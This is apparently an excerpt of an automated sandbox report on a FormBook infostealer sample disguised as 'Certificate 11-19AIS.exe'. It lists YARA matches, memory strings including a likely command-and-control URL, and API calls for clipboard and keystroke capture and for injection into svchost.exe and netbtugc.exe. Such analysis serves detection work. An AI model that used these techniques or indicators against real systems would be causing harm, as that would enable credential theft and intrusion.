            Source: netbtugc.exe, 00000004.00000002.3776112621.0000000002B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: netbtugc.exe, 00000004.00000002.3776112621.0000000002B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.3776112621.0000000002B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: netbtugc.exe, 00000004.00000002.3776112621.0000000002B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Pc
            Source: netbtugc.exe, 00000004.00000002.3776112621.0000000002B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.3776112621.0000000002B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.3782139985.0000000004ADA000.00000004.10000000.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.00000000048AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?zh=mxnR
            Source: netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000004.00000002.3784325817.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3782139985.000000000416E000.00000004.10000000.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.0000000003F3E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.0000000003F3E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00806B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00806B0C
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00806D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00806D07
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00806B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00806B0C
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007F2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_007F2B37
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_0081F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0081F7FF

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: This is a third-party compiled AutoIt script.0_2_007B3D19
            Source: Certificate 11-19AIS.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Certificate 11-19AIS.exe, 00000000.00000000.1292684977.000000000085E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_baed096a-2
            Source: Certificate 11-19AIS.exe, 00000000.00000000.1292684977.000000000085E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: ~SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f07caf1b-0
            Source: Certificate 11-19AIS.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_af8e7d42-f
            Source: Certificate 11-19AIS.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d1832ecc-5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,2_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474340 NtSetContextThread,2_2_03474340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474650 NtSuspendThread,2_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BE0 NtQueryValueKey,2_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BF0 NtAllocateVirtualMemory,2_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B80 NtQueryInformationFile,2_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BA0 NtEnumerateValueKey,2_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AD0 NtReadFile,2_2_03472AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AF0 NtWriteFile,2_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AB0 NtWaitForSingleObject,2_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F60 NtCreateProcessEx,2_2_03472F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F30 NtCreateSection,2_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FE0 NtCreateFile,2_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F90 NtProtectVirtualMemory,2_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FA0 NtQuerySection,2_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E80 NtReadVirtualMemory,2_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EA0 NtAdjustPrivilegesToken,2_2_03472EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D00 NtSetInformationFile,2_2_03472D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D10 NtMapViewOfSection,2_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D30 NtUnmapViewOfSection,2_2_03472D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DD0 NtDelayExecution,2_2_03472DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DB0 NtEnumerateKey,2_2_03472DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C60 NtCreateKey,2_2_03472C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C00 NtQueryInformationProcess,2_2_03472C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CC0 NtQueryVirtualMemory,2_2_03472CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CF0 NtOpenProcess,2_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CA0 NtQueryInformationToken,2_2_03472CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473010 NtOpenDirectoryObject,2_2_03473010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473090 NtSetValueKey,2_2_03473090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034739B0 NtGetContextThread,2_2_034739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D70 NtOpenThread,2_2_03473D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D10 NtOpenProcessToken,2_2_03473D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF4340 NtSetContextThread,LdrInitializeThunk,4_2_02FF4340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF4650 NtSuspendThread,LdrInitializeThunk,4_2_02FF4650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2AF0 NtWriteFile,LdrInitializeThunk,4_2_02FF2AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2AD0 NtReadFile,LdrInitializeThunk,4_2_02FF2AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_02FF2BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_02FF2BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_02FF2BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2B60 NtClose,LdrInitializeThunk,4_2_02FF2B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_02FF2EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_02FF2E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2FE0 NtCreateFile,LdrInitializeThunk,4_2_02FF2FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2FB0 NtResumeThread,LdrInitializeThunk,4_2_02FF2FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2F30 NtCreateSection,LdrInitializeThunk,4_2_02FF2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_02FF2CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02FF2C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2C60 NtCreateKey,LdrInitializeThunk,4_2_02FF2C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_02FF2DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2DD0 NtDelayExecution,LdrInitializeThunk,4_2_02FF2DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_02FF2D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_02FF2D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF35C0 NtCreateMutant,LdrInitializeThunk,4_2_02FF35C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF39B0 NtGetContextThread,LdrInitializeThunk,4_2_02FF39B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2AB0 NtWaitForSingleObject,4_2_02FF2AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2B80 NtQueryInformationFile,4_2_02FF2B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2EA0 NtAdjustPrivilegesToken,4_2_02FF2EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2E30 NtWriteVirtualMemory,4_2_02FF2E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2FA0 NtQuerySection,4_2_02FF2FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2F90 NtProtectVirtualMemory,4_2_02FF2F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2F60 NtCreateProcessEx,4_2_02FF2F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2CF0 NtOpenProcess,4_2_02FF2CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2CC0 NtQueryVirtualMemory,4_2_02FF2CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2C00 NtQueryInformationProcess,4_2_02FF2C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2DB0 NtEnumerateKey,4_2_02FF2DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF2D00 NtSetInformationFile,4_2_02FF2D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF3090 NtSetValueKey,4_2_02FF3090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF3010 NtOpenDirectoryObject,4_2_02FF3010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF3D70 NtOpenThread,4_2_02FF3D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02FF3D10 NtOpenProcessToken,4_2_02FF3D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02837A70 NtReadFile,4_2_02837A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02837BE0 NtClose,4_2_02837BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02837B50 NtDeleteFile,4_2_02837B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02837920 NtCreateFile,4_2_02837920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02837D30 NtAllocateVirtualMemory,4_2_02837D30
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007F6606: CreateFileW,DeviceIoControl,CloseHandle,0_2_007F6606
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007EACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_007EACC5
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007F79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007F79D3
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007DB0430_2_007DB043
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007C32000_2_007C3200
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007C3B700_2_007C3B70
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007E410F0_2_007E410F
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007D02A40_2_007D02A4
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007BE3B00_2_007BE3B0
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007E038E0_2_007E038E
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007E467F0_2_007E467F
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007D06D90_2_007D06D9
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_0081AACE0_2_0081AACE
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007E4BEF0_2_007E4BEF
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007DCCC10_2_007DCCC1
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007BAF500_2_007BAF50
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007B6F070_2_007B6F07
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_008131BC0_2_008131BC
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007CB11F0_2_007CB11F
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007DD1B90_2_007DD1B9
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007E724D0_2_007E724D
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007D123A0_2_007D123A
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007B93F00_2_007B93F0
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007F13CA0_2_007F13CA
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007CF5630_2_007CF563
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007FB6CC0_2_007FB6CC
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007B96C00_2_007B96C0
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_0081F7FF0_2_0081F7FF
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007B77B00_2_007B77B0
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007E79C90_2_007E79C9
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007CFA570_2_007CFA57
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007B9B600_2_007B9B60
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007B7D190_2_007B7D19
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007CFE6F0_2_007CFE6F
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007D9ED00_2_007D9ED0
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007B7FA30_2_007B7FA3
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00EF3CD80_2_00EF3CD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168712_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168732_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028A02_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101732_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011102_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1F32_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012902_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035002_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040268A2_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026982_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026A02_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF4A2_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D7532_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF532_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA3522_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F02_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035003E62_2_035003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E02742_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C02C02_2_034C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C81582_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034301002_2_03430100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA1182_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F81CC2_2_034F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F41A22_2_034F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035001AA2_2_035001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D20002_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034647502_2_03464750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034407702_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C02_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C6E02_2_0345C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034405352_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035005912_2_03500591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F24462_2_034F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E44202_2_034E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EE4F62_2_034EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB402_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F6BD72_2_034F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA802_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034569622_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A02_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350A9A62_2_0350A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344A8402_2_0344A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034428402_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E8F02_2_0346E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034268B82_2_034268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F402_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03482F282_2_03482F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460F302_2_03460F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E2F302_2_034E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC82_2_03432FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344CFE02_2_0344CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BEFA02_2_034BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440E592_2_03440E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEE262_2_034FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEEDB2_2_034FEEDB
